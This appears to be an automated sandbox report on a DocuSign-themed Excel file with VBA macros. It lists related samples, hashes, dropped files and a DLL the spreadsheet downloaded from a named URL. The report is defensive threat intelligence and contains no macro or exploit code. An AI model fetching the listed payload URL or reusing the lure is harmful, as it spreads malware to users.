                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\8[1].jjkesSecuriteInfo.com.Exploit.Siggen3.10350.15803.xlsGet hashmaliciousBrowse
                                                                                                                                                                  SecuriteInfo.com.Exploit.Siggen3.10350.26515.xlsGet hashmaliciousBrowse
                                                                                                                                                                    SecuriteInfo.com.Exploit.Siggen3.10350.31033.xlsGet hashmaliciousBrowse
                                                                                                                                                                      SecuriteInfo.com.Heur.1476.xlsGet hashmaliciousBrowse
                                                                                                                                                                        SecuriteInfo.com.Heur.1181.xlsGet hashmaliciousBrowse
                                                                                                                                                                          SecuriteInfo.com.Heur.21235.xlsGet hashmaliciousBrowse
                                                                                                                                                                            SecuriteInfo.com.Heur.15875.xlsGet hashmaliciousBrowse
                                                                                                                                                                              SecuriteInfo.com.Heur.21759.xlsGet hashmaliciousBrowse
                                                                                                                                                                                SecuriteInfo.com.Heur.2804.xlsGet hashmaliciousBrowse
                                                                                                                                                                                  SecuriteInfo.com.Heur.1138.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    SecuriteInfo.com.Heur.11266.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      SecuriteInfo.com.Heur.18554.xlsGet hashmaliciousBrowse
                                                                                                                                                                                        Sign-636.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          Sign-92793351_1597657581.xlsGet hashmaliciousBrowse
                                                                                                                                                                                            Sign-979329054_1327186231.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              Sign-709986424_219667767.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                Sign-488964532_2104982999.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  Sign-707465831_1420670581.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                    C:\Users\user\BASE.BABAASecuriteInfo.com.Exploit.Siggen3.10350.24644.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                      SecuriteInfo.com.Exploit.Siggen3.10350.15803.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                        SecuriteInfo.com.Exploit.Siggen3.10350.26515.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          SecuriteInfo.com.Exploit.Siggen3.10350.31033.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                            SecuriteInfo.com.Heur.1476.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                              SecuriteInfo.com.Heur.1181.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                SecuriteInfo.com.Heur.21235.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  SecuriteInfo.com.Heur.15875.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                    SecuriteInfo.com.Heur.21759.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                      SecuriteInfo.com.Heur.2804.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                        SecuriteInfo.com.Heur.1138.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                          SecuriteInfo.com.Heur.11266.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                            SecuriteInfo.com.Heur.18554.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                              Sign-636.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                                Sign-92793351_1597657581.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                                  Sign-979329054_1327186231.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                                    Sign-709986424_219667767.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                                      Sign-488964532_2104982999.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                                        Sign-707465831_1420670581.xlsGet hashmaliciousBrowse

                                                                                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\0A9D11FF-4298-45F3-AA1F-C11C872960F8
                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                                          File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):132891
                                                                                                                                                                                                                                          Entropy (8bit):5.3758450567869485
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:1536:fcQceNquBXA3gBwJpQ9DQW+zA9H34ZldpKWXboOilXNErLdzEh:PcQ9DQW+z0XiK
                                                                                                                                                                                                                                          MD5:99C380581926D8A89EE49456AF5AE10C
                                                                                                                                                                                                                                          SHA1:B09969A46C03D8DC2DEAAB82F4CF965C4A33FF74
                                                                                                                                                                                                                                          SHA-256:FBC556D8F40117D9BF9C9A588F7F8846AE378366B44A1CED813FA52FB89EC2D2
                                                                                                                                                                                                                                          SHA-512:C27293C7FA4941D83BF8FBF769A9F17B07F35286C7D3011CDC5A8FB625F464DD901A3725C4AFD43477F4723E7DB0417E413203E76DA58A5BF9504FBAE7BB72AA
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-02-20T01:12:32">.. Build: 16.0.13817.30529-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\8[1].jjkes
                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                          Size (bytes):4591104
                                                                                                                                                                                                                                          Entropy (8bit):5.0540147937501265
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:49152:7SkyvIo/YMOZswCkQzvhtawebv5hW2/yF//4VPQw:NCetO//S9
                                                                                                                                                                                                                                          MD5:25056DF6D3546DE971EAFE5DA5F9AE44
                                                                                                                                                                                                                                          SHA1:179555B3D0391E45DF29E651B8ED0342D02FE88A
                                                                                                                                                                                                                                          SHA-256:AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB
                                                                                                                                                                                                                                          SHA-512:8032A5BD9B07ACCC290B24FD2AFA299AFD12214026089665836FADE7282F0D217FFD79F5A3A12FD64E0E08D4F6FA0A04A8B036B4CDC1F95356B0BF43D6A80B50
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 6%
                                                                                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                                                                                          • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.26515.xls, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.31033.xls, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: SecuriteInfo.com.Heur.1476.xls, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: SecuriteInfo.com.Heur.1181.xls, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: SecuriteInfo.com.Heur.21235.xls, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: SecuriteInfo.com.Heur.15875.xls, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: SecuriteInfo.com.Heur.21759.xls, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: SecuriteInfo.com.Heur.2804.xls, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: SecuriteInfo.com.Heur.1138.xls, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: SecuriteInfo.com.Heur.11266.xls, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: SecuriteInfo.com.Heur.18554.xls, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: Sign-636.xls, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: Sign-92793351_1597657581.xls, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: Sign-979329054_1327186231.xls, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: Sign-709986424_219667767.xls, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: Sign-488964532_2104982999.xls, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: Sign-707465831_1420670581.xls, Detection: malicious, Browse
                                                                                                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                                                                                                          IE Cache URL:http://www.chipmania.it/mails/open.php
                                                                                                                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........*.y.K.*.K.*.K.*.#.+.K.*.#.+~K.*.#.+.K.*.;.+.K.*.;.+.K.*.#.+.K.*.K.*.K.*.;.+.K.*N:.+.K.*N:.+.K.*N:.*.K.*N:.+.K.*Rich.K.*........................PE..L....s/`...........!.....rB..........}A.......B..............................`F...........@......................... .D.`.....D.<.....D.Xp...................@F.....`.D.p............................D.@.............B.X............................text....qB......rB................. ..`.rdata........B......vB.............@..@.data...8.....D.......D.............@....rsrc...Xp....D..r....D.............@..@.reloc.......@F.......E.............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\E4810000
                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):155599
                                                                                                                                                                                                                                          Entropy (8bit):7.660724495027511
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3072:szpupSzxNEBBD+Os7/xxkKCtRbsYO1entseoXXR:stGSzx0dmxk7RbsYsKtseoXB
                                                                                                                                                                                                                                          MD5:ED7434816143C02357D1BBBE2A2A7CFC
                                                                                                                                                                                                                                          SHA1:992FF0FBC9408F86BE9907732A99E0A876E44823
                                                                                                                                                                                                                                          SHA-256:6EC7A533F057BE20E2E4F0A0FE1901BFB07A4CB9F9DF0C2BFA4915F699DC1FF5
                                                                                                                                                                                                                                          SHA-512:580186A492F8F6AFDD5FD2F4A817D1A0F5291433764AA98C6E10C0E8A6CE62ABEEDAF01CDCA69D1E26B2FF7E0160CD4848A4A5ACCA1674743323A58664E08626
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Preview: .U.N.1.}G.?..Z.:.TU(..Z.X.....]7..c ..... .I..eo.s.c{f|...z.....7#V..^i.....;.0.....Z..d./g.e..(.a......({.....Qd...^c..s......q.]...1.d..f...fA.WJ.....L.2...R$...."..l.%(/.-A7."..=@...Q.c....0d|'.......Yt...`p....e.b.....].....X....F....1.......}.O..7.A...kXH0M.BF......v/..0.L..v~...m...s%.....{..M..Ci..X|4M....\O7........~..@.1."..OtR.O........s..........{..........?....]..i.D.N..Bsv...b.i..Z......B.S...n^...........PK..........!..#|.....X.......[Content_Types].xml ...(..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Sat Feb 20 09:12:35 2021, atime=Sat Feb 20 09:12:35 2021, length=12288, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):904
                                                                                                                                                                                                                                          Entropy (8bit):4.660352145974422
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12:8aPRJ3XU1uElPCH2AM5YycLyM+WrjAZ/2bD03DLC5Lu4t2Y+xIBjKZm:8aNMLPOAZiDMq87aB6m
                                                                                                                                                                                                                                          MD5:CB60D00779F9B5E97CE1345EB6B1EB55
                                                                                                                                                                                                                                          SHA1:C3D1E25C4A771BEF44E9FB0F62DF77918B6526F5
                                                                                                                                                                                                                                          SHA-256:8786F5C97312820962916D811504647BB1D9FB91DD86F750B2480A32AF00035E
                                                                                                                                                                                                                                          SHA-512:87EF36A871AC326CE2CB323EFFE3F9E7372F1FEE27503C477EA1E8DE93E7619F3B1CE84BE3F6EACB39956CEFD80E952D854121B882C3DADFED7AA35F5A0A0492
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Preview: L..................F........N....-...o..p....o..p....0......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..TR.Q....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qwx..user.<.......Ny.TR.Q.....S....................c...h.a.r.d.z.....~.1.....TR.Q..Desktop.h.......Ny.TR.Q.....Y..............>......._.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......724471...........!a..%.H.VZAj...4.4...........-..!a..%.H.VZAj...4.4...........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls.LNK
                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:42 2020, mtime=Sat Feb 20 09:12:35 2021, atime=Sat Feb 20 09:12:35 2021, length=168448, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):2450
                                                                                                                                                                                                                                          Entropy (8bit):4.69586310147432
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8kBMWCCNEAEKW/HCNIDMNr7aB6mykBMWCCNEAEKW/HCNIDMNr7aB6m:8sCCZEK4HCNNyB6psCCZEK4HCNNyB6
                                                                                                                                                                                                                                          MD5:9BC6E98287C245460FE25BBA6F4FF819
                                                                                                                                                                                                                                          SHA1:76F6B20FD50B573DF2AF09598FB47B466EFF3AD9
                                                                                                                                                                                                                                          SHA-256:72832B1CA23E707D3CDD80FBDCA681808AAB9A9945AC2EB36D3F54BEF13A245B
                                                                                                                                                                                                                                          SHA-512:3F85E98E920859E88BBA4FE4D08B058BFCFB1E3CD550E852F723A99BE8A268E4C8DFC28338CA7454E99BC092A66A6CD3E4BDBFC63A752C3C28DC49B5D2FAA8C0
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Preview: L..................F.... .......:....4..p....4..p...........................#....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..TR.Q....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qwx..user.<.......Ny.TR.Q.....S....................c...h.a.r.d.z.....~.1.....>Qxx..Desktop.h.......Ny.TR.Q.....Y..............>.........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....TR.Q .SECURI~1.XLS.........>QvxTR.Q....h......................ru.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...S.i.g.g.e.n.3...1.0.3.5.0...2.7.3.0.3...x.l.s.......v...............-.......u...........>.S......C:\Users\user\Desktop\SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls..G.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...S.i.g.g.e.n.3...1.0.3.5.0...2.7.3.0.3...x.l.s.........:..,.LB.)...As...`.......X.......724471...........!a..%.H.VZAj...#..-.........-..!a..%.H.VZAj...#..-
                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):197
                                                                                                                                                                                                                                          Entropy (8bit):4.820176523154025
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:oyBVomM0bcsoMW/SvUuscbcsoMW/SvUmM0bcsoMW/SvUv:dj60wsoMWKBwsoMWKO0wsoMWKO
                                                                                                                                                                                                                                          MD5:EAC27266144E690BCC7C578C236897AB
                                                                                                                                                                                                                                          SHA1:7DCCBA16AA5BDDFF9AA17D3B7E359C71630A79BD
                                                                                                                                                                                                                                          SHA-256:4299224EC75DABADF975DF1A367F7B08D15F406BCCFDA4C348FEC71FAEF5A0CF
                                                                                                                                                                                                                                          SHA-512:259E5AEE64A552E542E9BC46CE953371621D233330DCCA8F76A90F6488BE758F5DD35A0C87BDBBDEB06CDA1ECE7EDCEBB992C02520036E8E1F02F8E92DD2ACA5
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Preview: Desktop.LNK=0..[xls]..SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls.LNK=0..SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls.LNK=0..[xls]..SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls.LNK=0..
                                                                                                                                                                                                                                          C:\Users\user\BASE.BABAA
                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):4591104
                                                                                                                                                                                                                                          Entropy (8bit):5.0540147937501265
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:49152:7SkyvIo/YMOZswCkQzvhtawebv5hW2/yF//4VPQw:NCetO//S9
                                                                                                                                                                                                                                          MD5:25056DF6D3546DE971EAFE5DA5F9AE44
                                                                                                                                                                                                                                          SHA1:179555B3D0391E45DF29E651B8ED0342D02FE88A
                                                                                                                                                                                                                                          SHA-256:AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB
                                                                                                                                                                                                                                          SHA-512:8032A5BD9B07ACCC290B24FD2AFA299AFD12214026089665836FADE7282F0D217FFD79F5A3A12FD64E0E08D4F6FA0A04A8B036B4CDC1F95356B0BF43D6A80B50
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 6%
                                                                                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                                                                                          • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.24644.xls, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.26515.xls, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.31033.xls, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: SecuriteInfo.com.Heur.1476.xls, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: SecuriteInfo.com.Heur.1181.xls, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: SecuriteInfo.com.Heur.21235.xls, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: SecuriteInfo.com.Heur.15875.xls, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: SecuriteInfo.com.Heur.21759.xls, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: SecuriteInfo.com.Heur.2804.xls, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: SecuriteInfo.com.Heur.1138.xls, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: SecuriteInfo.com.Heur.11266.xls, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: SecuriteInfo.com.Heur.18554.xls, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: Sign-636.xls, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: Sign-92793351_1597657581.xls, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: Sign-979329054_1327186231.xls, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: Sign-709986424_219667767.xls, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: Sign-488964532_2104982999.xls, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: Sign-707465831_1420670581.xls, Detection: malicious, Browse
                                                                                                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........*.y.K.*.K.*.K.*.#.+.K.*.#.+~K.*.#.+.K.*.;.+.K.*.;.+.K.*.#.+.K.*.K.*.K.*.;.+.K.*N:.+.K.*N:.+.K.*N:.*.K.*N:.+.K.*Rich.K.*........................PE..L....s/`...........!.....rB..........}A.......B..............................`F...........@......................... .D.`.....D.<.....D.Xp...................@F.....`.D.p............................D.@.............B.X............................text....qB......rB................. ..`.rdata........B......vB.............@..@.data...8.....D.......D.............@....rsrc...Xp....D..r....D.............@..@.reloc.......@F.......E.............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                          C:\Users\user\Desktop\A7810000
                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                                          File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):177123
                                                                                                                                                                                                                                          Entropy (8bit):7.237251363847623
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3072:YccKoSsxzNDZLDZjlbR868O8KL5L+4iK2xEtjPOtioVjDGUU1qfDlaGGx+cL2QnX:VcKoSsxzNDZLDZjlbR868O8KL5L+4iKz
                                                                                                                                                                                                                                          MD5:128567159DCE2206AB85370A6556E797
                                                                                                                                                                                                                                          SHA1:CF80A1E5436A62776C760E130DD4BE643D84A261
                                                                                                                                                                                                                                          SHA-256:4574ABA9B9162407B033425FC27B13C1AC541718E370FBCE203941BA9988FBF0
                                                                                                                                                                                                                                          SHA-512:625530B78FAAF61379D1C67111EB578CAAC05342473D0638C32481880765DC7E76C9D39D5CCCC377751586656A2930720E807050B2F65CEFEE258E8B47F4DF0D
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Preview: ........T8..........................\.p.... B.....a.........=.............................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.............

                                                                                                                                                                                                                                          Static File Info

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Feb 19 10:48:36 2021, Security: 0
                                                                                                                                                                                                                                          Entropy (8bit):7.195176543915214
                                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                                          • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                                                                                                                          • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                                                                                                                          File name:SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls
                                                                                                                                                                                                                                          File size:168960
                                                                                                                                                                                                                                          MD5:ad9550ee6ece8322501ed92d374d3928
                                                                                                                                                                                                                                          SHA1:d0617e5cb90b4db4fcf2269ffd8228b9ca4f89af
                                                                                                                                                                                                                                          SHA256:74423c8236cd5057af8e4ffbf84fdcbb34f5e6dc8f8dc0520c685c7fd6bc100a
                                                                                                                                                                                                                                          SHA512:531ab2de644449e17e4f6d4a708f98a89bd6ac972b0bc6ed6b725205e5a0412ef6b0dfa9bdb422f6732c5396b8d0c82783c88c3727496488c71cb960b25d2f0b
                                                                                                                                                                                                                                          SSDEEP:3072:bScKoSsxzNDZLDZjlbR868O8KlVH3jiKq7uDphYHceXVhca+fMHLtyeGxcl8OUMj:OcKoSsxzNDZLDZjlbR868O8KlVH3jiK+
                                                                                                                                                                                                                                          File Content Preview:........................>.......................H...........................E...F...G..........................................................................................................................................................................

                                                                                                                                                                                                                                          File Icon

                                                                                                                                                                                                                                          Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                                                                                                                          Static OLE Info

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Document Type:OLE
                                                                                                                                                                                                                                          Number of OLE Files:1

                                                                                                                                                                                                                                          OLE File "SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls"

                                                                                                                                                                                                                                          Indicators

                                                                                                                                                                                                                                          Has Summary Info:True
                                                                                                                                                                                                                                          Application Name:Microsoft Excel
                                                                                                                                                                                                                                          Encrypted Document:False
                                                                                                                                                                                                                                          Contains Word Document Stream:False
                                                                                                                                                                                                                                          Contains Workbook/Book Stream:True
                                                                                                                                                                                                                                          Contains PowerPoint Document Stream:False
                                                                                                                                                                                                                                          Contains Visio Document Stream:False
                                                                                                                                                                                                                                          Contains ObjectPool Stream:
                                                                                                                                                                                                                                          Flash Objects Count:
                                                                                                                                                                                                                                          Contains VBA Macros:True

                                                                                                                                                                                                                                          Summary

                                                                                                                                                                                                                                          Code Page:1251
                                                                                                                                                                                                                                          Author:
                                                                                                                                                                                                                                          Last Saved By:
                                                                                                                                                                                                                                          Create Time:2006-09-16 00:00:00
                                                                                                                                                                                                                                          Last Saved Time:2021-02-19 10:48:36
                                                                                                                                                                                                                                          Creating Application:Microsoft Excel
                                                                                                                                                                                                                                          Security:0

                                                                                                                                                                                                                                          Document Summary

                                                                                                                                                                                                                                          Document Code Page:1251
                                                                                                                                                                                                                                          Thumbnail Scaling Desired:False
                                                                                                                                                                                                                                          Contains Dirty Links:False
                                                                                                                                                                                                                                          Shared Document:False
                                                                                                                                                                                                                                          Changed Hyperlinks:False
                                                                                                                                                                                                                                          Application Version:917504

                                                                                                                                                                                                                                          Streams

                                                                                                                                                                                                                                          Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                                                                                                          General
                                                                                                                                                                                                                                          Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Stream Size:4096
                                                                                                                                                                                                                                          Entropy:0.357299206868
                                                                                                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                                                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
